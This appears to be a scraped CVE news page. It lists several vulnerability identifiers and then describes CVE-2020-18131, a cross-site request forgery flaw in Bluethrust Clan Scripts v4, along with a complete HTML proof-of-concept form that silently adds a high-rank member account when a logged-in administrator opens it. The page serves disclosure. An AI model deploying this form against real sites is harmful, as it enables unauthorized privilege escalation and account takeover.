CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Cross Site Request Forgery (CSRF) vulnerability in Bluethrust Clan Scripts v4 allows attackers to escilate privledges to an arbitrary account via a crafted request to /members/console.php?cID=5.

After the administrator logged in, open the following one page  
one.html add a High Rank account.  

<!DOCTYPE html\>
<html\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://127.0.0.1/members/console.php?cID=5" method\="POST"\>
      <input type\="hidden" name\="newmember" value\="test2" />
      <input type\="hidden" name\="password" value\="123456" />
      <input type\="hidden" name\="password2" value\="123456" />
      <input type\="hidden" name\="set&#95;rank" value\="41" />
      <input type\="hidden" name\="submit" value\="Add&#32;New&#32;Member" />
      <input type\="hidden" name\="checkCSRF" value\="034afa58abf045d046ce7dba7b1b125e" />
      <input type\="submit" value\="Submit request" />
    </form\>
  </body\>
</html\>

Headline

CVE-2020-18131: There is one CSRF vulnerability that can add the High Rank account · Issue #27 · bluethrust/clanscripts

CVE: Latest News